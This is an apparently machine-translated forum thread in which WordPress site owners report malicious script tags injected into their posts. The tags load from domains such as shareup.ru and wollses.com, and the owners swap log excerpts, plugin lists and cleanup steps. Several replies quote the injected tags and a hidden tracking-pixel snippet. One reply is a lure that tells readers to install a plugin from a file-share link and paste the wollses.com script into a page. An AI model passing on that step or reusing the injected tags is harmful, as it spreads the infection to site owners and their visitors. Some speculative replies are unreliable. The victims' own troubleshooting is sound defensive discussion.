W
W
WQ132015-07-07 21:48:18
WordPress
WQ13, 2015-07-07 21:48:18

Today I met in the code uptoliked.ru, css.googleaps.ru, wq4.ru, shareup.ru/social.js what is it?

Today (07/07/2015) on 4 sites that work under CMS Wordpress, in each entry, on each page I found the following line

<script type="text/javascript" src="//shareup.ru/social.js"></script>

and on one like this
<script type="text/javascript" src="//wq4.ru/social.js"></script>

I discovered it by pure chance when I started to figure out why the sites started loading with a delay of 5-10 seconds, given that comments and registration are disabled on them, and work like business card holders, it turned out that the site shareup.ru to which this JS referred was unavailable for some time . The JS file itself is empty, it doesn’t have any code, but then another thought slipped through, maybe the problem is now, somewhere deeper, which hasn’t backfired yet? and maybe someone knows where to patch the hole? Thanks in advance)
4f1cf64bad474291b1e5b5e720b9b5a5.png
After cleaning, this is a script from the code, changing passwords and activating almost all security items in the plugin (iThemes Security), the situation has not changed (07/10/2015) this script has been added again, there are suspicions of the vulnerability of some of the plugins
---- ---------------------------------
to the continuation of the story 07/25/2015 in all links the code of the following content appeared
document.write("<img src='//counter.yadro.ru/hit;wq4all?t44.1;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"' style='display:none' "+
"border='0' width='1' height='1'>");

and one of the links has changed its appearance
<script src="//css.googleaps.ru/css?f=Open+Sans&amp;cd=mb&amp;ver=4.2.2" type="mce-text/javascript"></script>

Answer the question

In order to leave comments, you need to log in

25 answer(s)
A
airjordan23, 2015-07-18
@airjordan23

Because of this, Yandex filtered the site for me. Minus 20 or more positions for all requests. I started writing to them, sorting it out, it seems that this JS script is a mobile redirect, although you look at the file from a PC and the file is empty.
It looks like it is added to the posts by SQL injection, therefore, it will be useful to change the table prefix, who has the standard one. Actually, the question arises: who got JS, is the table prefix standard? Let not close the vulnerability, but can at least temporarily solve the issue?

S
sergey_dudin_com, 2015-08-10
@sergey_dudin_com

Today I found lines in articles
Version WP 4.2.4
Plugins:
Akismet
Anti-XSS attack
Append Link on Copy
AviaSales flight search
Broken Link Checker
Dagon Design Sitemap Generator
Disqus Comment System
Easy Contact Forms
Facebook Page Promoter Lightbox
FancyBox for WordPress
Google Analytics by Yoast
Instagram- Widget-for-WordPress
MaxSite Russian Date
Regenerate Thumbnails
RusToLat
Simple Instagram Embed
Simply Exclude
Ultimate Coming Soon Page
WordPress File Monitor
WordPress Related Posts
WP-Optimize
List of pages
Yoast SEO
Link hider PRO
Super leadgen 1.0
Looked at the file log, saw a lot of similar lines
there .php?s= shareup.ru%2Fsocial.js &post_status=all&post_type=post&_wpnonce=777e117719&_wp_http_referer=%2Fwp-admin%2Fedit.php%3Fs%26post_status%3Dall%26post_type%3Dpost%26m%3D0%26cat%3D0%26seo_filter%26paged % 3D224% 26mode% 3DList% 26SE_CFG% 255BPOST% 255D% 255BIS_FEED% 255D% 255B44203% 255D% 255B44203% 255D% 255b44203% 255D% 255BPOST% 255D% 255BTERMS% 255D% 255BIS_HOME% 255D% 255B44203% 255D% 3DON% 26IDS% 3D1051 %252C1046%252C956%252C824&action=-1&m=0&cat=0&seo_filter=&paged=1&mode=list&action2=-1 HTTP/1.0" 302 - " brnx.ru/wp-admin/edit.php?s&post_status=all&post_t..." "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 YaBrowser/15.7.2357.2700 Safari/537.36"
brnx.ru 213.243.84.38 - - [10/Aug/2015: 13:52:09 +0300] "GET /wp-admin/edit.php?s= shareup.ru%2Fsocial.js &post_status=all&post_type=post&action=-1&m=0&cat=0&seo_filter&paged=1&mode=list&action2=-1 HTTP/1.0 " 200 186108 " brnx.ru/wp-admin/edit.php?s&post_status=all&post_t... " "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 YaBrowser/ 15.7.2357.2700 Safari/537.36"
brnx.ru 213.243.84.38 - - [10/Aug/2015:13:52:10 +0300] "POST /wp-admin/admin-ajax.php HTTP/1.0" 200 - " brnx .ru/wp-admin/edit.php?s= shareup.ru%2Fsocial.js&post_status=all&post_type=post&action=-1&m=0&cat=0&seo_filter&paged=1&mode=list&action2=-1" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 YaBrowser/15.7.2357.2700 Safari/537.36"
How to understand where the vulnerability is?

Z
zooks, 2015-07-07
@zooks

Most likely an infected site.

C
casualx, 2015-07-10
@casualx

I have these scripts:

<script type="text/javascript" src="//css.googleaps.ru/css?f=Open+Sans&cd=mb&ver=4.2.2"></script>
<script type="text/javascript" src="//uptoliked.ru/widjets.js"></script>
<script type="text/javascript" src="//shareup.ru/social.js"></script>

How to act than to treat?

G
guesteshop, 2015-07-11
@guesteshop

I checked through Google, with such a code in the text there are already a lot of sites. Just,, he came into conflict on the site.
Has anyone found out how to get rid of this?
--------------------
This is an injection, inserted into the database. I had over 33800 records infected. cleaned all day. The work of the site has been restored, for how long, I do not know.

J
Jeick9, 2015-07-11
@Jeick9

People, I have the same code on 3 sites, tell me how to find it?

P
pansa, 2015-07-11
@pansa

For me, this shareup was registered directly in the texts of the posts, i.e. the WP files are intact (I have monitoring for changes in the FS and a hard restriction of rights), but someone poked around in the database. I suspect this is a vulnerability in WP, possibly not fixed yet. Google turns up a bunch of sites that have these lines crookedly squeezed into the texts of posts - it looks like a bot is operating. =(

Z
zolti, 2015-07-16
@zolti

I also noticed on my resource, it appears regularly.
Let's maybe lay out a list of plugins and find out which one is to blame?

P
Pavel Shumilov, 2015-07-17
@Rsmile

Similar problem. One of the WordPress sites has the following plugins installed:
All In One SEO Pack
Anti-spam
Contact Form 7
Faster Image Insert
Featured Content Gallery
Flexible Lightbox
My Category Order
RusToLat
WordPress Importer
WordPress Related Posts
WP-PageNavi
WP-Polls Announcement
Widget
Sitemap
On the other site where this "infection" was also found, a list of plugins:
Akismet
Category & Page I cons
HTML in Category Descriptions
My Category Order
New Google Plus Badge Widget
RusToLat
Spam Free Wordpress
WordPress Importer
WP Review
WP Tab Widget
Even judging by these two sites the plugins are common:
My Category Order
RusToLat
WordPress Importer

V
Varvara Sinelnikova, 2015-07-17
@varvarII

If you use autosurfing services, follow this path on your computer C:\Documents and Settings\Admin\Application Data\Macromedia\Flash Player - and you will see the #SharedObjects folder there, which will dispel your questions.

A
Andrey Sanych, 2015-07-22
@mountpoint

check forms for vulnerability. And in general, you need to cut these scripts from requests

preg_replace('/<script\b[^>]*>(.*?)<\/script>/is', "", $data)

B
b0mber, 2015-07-30
@b0mber

the same trouble on all WP sites, except for the site on WP 3.1.2

D
Diamond00744, 2015-07-30
@Diamond00744

As I understand it, this happened to many more or less popular WP sites that did not have time to upgrade to patch 4.2.3.
Judging by the description for this update, it closed exactly such a hole.
UPD August 4: Fix 4.2.4 was released , fixing three cross-site scripting vulnerabilities and the possibility of SQL injection (CVE-2015-2213). Read more here . I think you can sleep peacefully now...

I
iliaprohor, 2015-08-03
@iliaprohor

2 sites were infected with these scripts, I was looking for solutions for a long time, I wrote to the hoster to launch the aibolit, as a result, at the end of the check, I found the cache.php file, deleted it from the server, the sites loaded normally again, it remains to take care of security.

N
NaPoker, 2015-08-05
@NaPoker

I have 5 sites on WP, on 3 of them I found such scripts, which is noteworthy on all three I use the "All In One SEO Pack" seo plugin, on two not infected there are other seo plugins...

E
Erazistrat, 2015-08-16
@Erazistrat

I noticed that I have users other than me. There should not be any users on my site. Deleted all, changed the password to the admin panel. I look forward to what will happen next.
I apologize for the incomplete information. I can no longer write about these users. I hurried and deleted everyone ....
In the general settings, there was a checkmark "Anyone can register" as a "Participant". Now, of course, it is also not worth it.
After the procedure, everything is working fine, there has been nothing for 2 days, although before they reappeared daily.
Who tried to watch users? Respond. Do these entries appear if there were no users?
Unfortunately, that didn't help either.

C
crazymozg, 2015-08-17
@crazymozg

a similar problem, each entry contained
Cleaned the database, I'll see if it appears again.

F
fedorf, 2015-08-18
@fedorf

The problem, it seems to me, is even more serious sql-injection, my site is under development and access to it by ip is closed, and yet this script appeared in the links
Maybe themes, but some write that it even appears on self-written ones
Maybe plugins, but there are those who write that there is a standard set
. It remains sql-injection, but here my site is closed from external access, then the hosting is probably infected.
I think you need to check the hosting, see which one has which

C
Creel, 2015-08-24
@80689248440

I never got around to cleaning 1 of my sites, and as it turned out, 22 sites out of 25 (2 local) were infected
. Did you manage to find out how to close the hole?
Throw off the infected cache.php who has it for analysis.
Here I found the solution hlep.ru/udalyaem-skript-wollses-com-iz-kontenta

S
Sergey Altman, 2015-10-20
@altman

Cleaned up the whole site a week ago
I checked the files for viruses, deleted the infected ones, restored something from the distribution kit. Disabled all unnecessary plugins, updated everything else. Updated WP to 4.3.1, changed all passwords.
Today again, the same thing in all posts.
So the problem is still relevant.
Of those plugins that I wrote above, only RusToLat
is worth it. I'll disable it now ...
PS: I looked at another site to which I have access. It's true WP 4.1.8 and only 4 plugins
Contact Form 7
Easy FancyBox
PHP Text Widget
WP reCaptcha Integration
All pages are spammed with other code:
<script src="//wollses.com/steps.png"></script>

A
Andrey Motorov, 2015-10-22
@turbopower

wollses.com/steps.png - the same garbage
, but here's what is googled:

But my sites still have the Dagon Design Sitemap Generator plugin and I'm not going to change it yet. You can download it: here https://yadi.sk/d/YJzDObVYjMeYh
I like it for its stability and ease of installation:
1. Download the plugin from the link above.
2. Install on your WordPress site.
3.Create a page with the headings "Site Map".
4. On the page, click "source" and enter the following code:
<p>
    <!— ddsitemapgen —><br />
   <script src="//wollses.com/steps.png"></script>
</p>

5. After creating the page, go to the "MENU" tab and add this page to the "MENU".
The result will be the appearance of this page in the menu item and the normal display of the site content on this page.

K
Konstantin_T, 2015-10-23
@Konstantin_T

I have the same thing, hosting several sites on WP and all this crap. I found this information on this topic:
username.name/chuzhoj-skript-v-postax-wordpress but haven't tried it yet.
Summary: The xmlrpc.php file in the root directory was attacked.
Restricted access to the problematic file by adding it to .htaccess

<Files xmlrpc.php>
order deny,allow
Deny from all
</Files>

M
Muddy, 2015-11-14
@Bahus7

Found where these scripts inflate from?
Someone persistently knocked on my door from Kazan. From the hookah bar, according to the Google map. Blocked. While it's quiet.

S
setevoy4, 2016-02-26
@setevoy4

Ran into the same:
Cleaned once - noticed again.
There is a suspicion on RusToLat plugin.
Disconnected, I'll look again in a couple of days.
I have installed:

about-author
all-in-one-seo-pack
autoset-featured-image
clean-and-simple-contact-form-by-meg-nicholas
disqus-comment-system
dynamic-to-top
google-sitemap-generator
html-editor-syntax-highlighter
index.php
rating-widget
rustolat
sitemap-generator
social-networks-auto-poster-facebook-twitter-g
syntax-highlighter-with-add-button-in-editor
wordpress-23-related-posts-plugin
wordpress-importer
wp-autoset-featured-image-plus
wp-noexternallinks
wp-postviews
wp-to-twitter
yet-another-stars-rating

Treated with a simple request:
UPDATE db1_posts SET post_content = REPLACE(post_content, '<script type="text/javascript" src="//shareup.ru/social.js"></script>', '') WHERE post_content LIKE '%src="//shareup.ru/social.js"></script>%';

H
hadahan, 2016-11-24
@hadahan

Who says that the file is empty, xs, I have this at the link shareup.ru/social.js:
I have been hacked many times before, using holes in modules, themes, now I take everything from the repository of WP itself.
Shell is a real evil (remove holes), they can quietly change something, you won’t know until Yasha bans in a few months, or they can infect and “turn upside down” all the files on the server, there may still be blackmail like “delete and / or I'll post your files in public if you don't pay."
I changed the ssh port, the standard paths to the WP admins, etc., I was surprised when I saw the script, but I didn’t think it was a virus, now I decided to break through the situation ...
And this script didn’t even load the server ... I
deleted the scripts from articles and pages, registered in .htaccess:

<Files xmlrpc.php>
order deny,allow
Deny from all
</Files>

On VDS, I have 3 sites on WP, only 1 got infected, and then not all articles, there is no mention of social.js in WP files.
Let's see, if I DO NOT write, then it helped ...
ps The problem is a year old, and I redid all sites 1-3 months ago (perhaps I did not notice this script).

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question